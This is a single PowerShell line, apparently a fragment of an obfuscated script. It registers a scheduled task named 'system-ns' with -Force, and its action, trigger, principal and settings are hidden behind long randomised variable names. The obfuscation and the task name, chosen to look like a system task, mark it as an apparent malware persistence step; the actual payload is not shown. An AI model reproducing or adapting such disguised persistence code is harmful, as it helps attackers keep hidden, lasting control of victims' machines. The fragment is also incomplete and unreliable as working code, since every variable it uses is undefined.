Register-ScheduledTask -Action $qH9e9HrW4cUoSJzx9zXX8T2dGbIiu2xa5uSZtYHTHY4nVUr26ufNl4VL9Cov8z7jg1R5MhWi74sX1V0lyBv6CV2eDJu0WWeOjdWn3AbahzEIkkkaCqmRe2mL3utocF6dqwVd40f3Rg0caW5FD8ZJ1rkoVfnrpioxRwHBGXKVtEd8Mpc4Qhr69PffRycAi4QwIlj2kJNiNYajsgCzH3SdDB1KgQQwA59Auhd7r0Sg6IIbLMUSBwfU9HX3w5sWiFLPNlxxWfOpWhsPAObN5x43u6vDzPCwmiW6FAeZrz7mVDqXVA4PxaWww6DTnVvSssbg5vCzz0OgthT1Ttx6lyAxW2u8815ljkxj1xxbizxrpAqAvNfWPYd25v6YITnJ5LLArzZ3FaWXXTM40yjpUsjhLcLy6mygyvrXo5HXJsRE0X7VWbWH5xbqjXHB2HivQOVhSqoK1jbaQS4zkz8acy72vU4OWp7iuAZBgs5MEuk8pq9L1xJV6sV34wyDk0utI8EmyWiLoZvJM1Z08fwi51PJw8no9V5IqxG6EldBorT98LPzdDCY0PBy4bsEdX7ZMyXNY1cMS8fypLXuawDbDnXhEr4vwunNxUti3PkoWXQQ6QJhn4cUGu4 -Trigger $oWhp7VvfACIsCNqJ039bH0RX1218OQobiUVjNTdOa4KySSlyF4h9vGjTvllY9AZFsyqFhxhsfSE4N5i7aL9h5J8LOKUrgIYcmQ1GnspvElb8lq42R39gZ6SG7KmC3QLUSVlqfzzjmLI3ks17iMgBOurNBFGEA1ztctAg472yQRNPavQ85mpqoBxU68fv0yrNB0aLeNXtcYEnggBjjZacwzlVbAf7YvYmAvinNd43A8QhYiptnVPZ1xoxe8HBla8pOmySEwzkb3RNMAZAZ8jBo6aBUH6odsEHbum5mEbUG8HZTAuvANIX5GpYlEvyOrWkQ7ZQD77nB8nNSfLvgzaiDcP5FIjRzpRMP3FQR5VajcgNxDu1Ma1znYmnhLOtZWanMPBs5cZNWSWUtSRf6wDplLotBfFqCuykOKMGIYHr1hC4vYU6AtD7t2sJxc8fCTAwsRbauVRra0y -TaskName "system-ns" -Principal $MMOjbezwzBKIT03o24fqHJZ39kFoqjMLP75gV7ewmtyHkVffFnupeJNLZbTGbuiwHhwFggSgP7jqXUcMGAoqjHGmiz556DwGGl6jPkkSbsLXBHoi9S6yGQjIdCDc0H9BOXadVenf7pHquumWMVS1k3PO6Hcs1GiqDKNf6tIpANGL6GFQhB5dNHIrFjUoSAB02NDbAwmcwaQgpAuYjlfRfAtlBRfrqSVzUQyl4IRMuJXeQx3Zz37QJ9SHfXKcpCAh7zp2AclL5NhKBuSo74orm8ye73heHIuOgfTiYBz0XhId7yfbyte5H6CXDOQvizSCnss3KYRuACdDugc652mz3k8eNkAg2MH9uTjc8cQc6F8YfTTV8pHZrlI30YiauvVsB4JkPwIOwmPeOZcHmJKOdC1srU1GuWcu5OTA4qBtjDKHCrPud6tYdLSNbzHgiSjPZxbdfhHmZHCSqymHFfMsdennG2NJ8chbNUb47CajogBuhPrXBNttAOyxiMAInWxABNThvOuyOeV6iKi9rWUMGoUd3zcNAj8O0pCuv9Ky5ORIBfNGZ7A2QrfE5TLBZBOqXrVk0MFs0nOrUAwp6GgnmnIolO09f3Bh06FP9n1ooeIa67WOjb90mSXESIWnXJFFGOA6Bs2qqZWzGgvLhgrX7iGqsTDcNYcVmDYn3KMGFjoNKEqViCkX2sdM4V6Az68ITPGp1onSSfnLU4V6BKBezn0EvglOAZc6ZsOud8dy7vOzv4plCBB5GIHtnIDoLINiSA6FJ55nWsgX8AAWm42DPiVfdXUB4t1HwMDcBqJndomf3aGmQcXEaM -Settings $f3a47oHbpfsqYrOOwKvYszfR6F6AcYDcFBo3a3mahd15QPHnJ9zscmRUkdAYZKSwvqAhsgUTyo6qVj026yrnK8rN6Bio7m3e1EUP5HCaRfU21SvkxLxKUU8I7NIb4wnRBznhqGPoICF8rlG8j4V2XZ7eu8Dvd4GuyrjFVCa3nhjTe68MGWuZJ1CYJT6ZZjyuAMdKPmh0Ea90r5Rdsul0mHLAdr3Rpir3i8I91iahkItDnALZhsG0LGgoW62I8cDTH26l76Y4bXMSRiN7U2seqfhQSneSHu6Wj4w4OBKL0gQJ7Hnavkre0Pa4RhltCdlJu8uNwTZ6GPsmtm4W6ajLDDl3e9F6rKlxUoWnCWVtmWSgXOHdk37VwyMHq3k8pWKxAVUr4GcV2JEye5P7BkvMIOxh8qIUQyg5M90mHDojSYg5wVmKFk0fy1Rzbx6zCtS1znY3Ky0sEBiNav1MWJWlDZzkjdPNonwqo6wUCxGLxm7CJ57NfJYkPbF0CGE3kURQJUfDs1at9hH1jB61Vdymfz9EvaRVqCzdLsxPcjmzRNXVUBuE903Qn5xFcDXTWI7EIIogFYSXaAqBPhE0EVm6ve2LBXEu9ZQ0QtiJ3sdZjKpXl4PrE6Z -Force
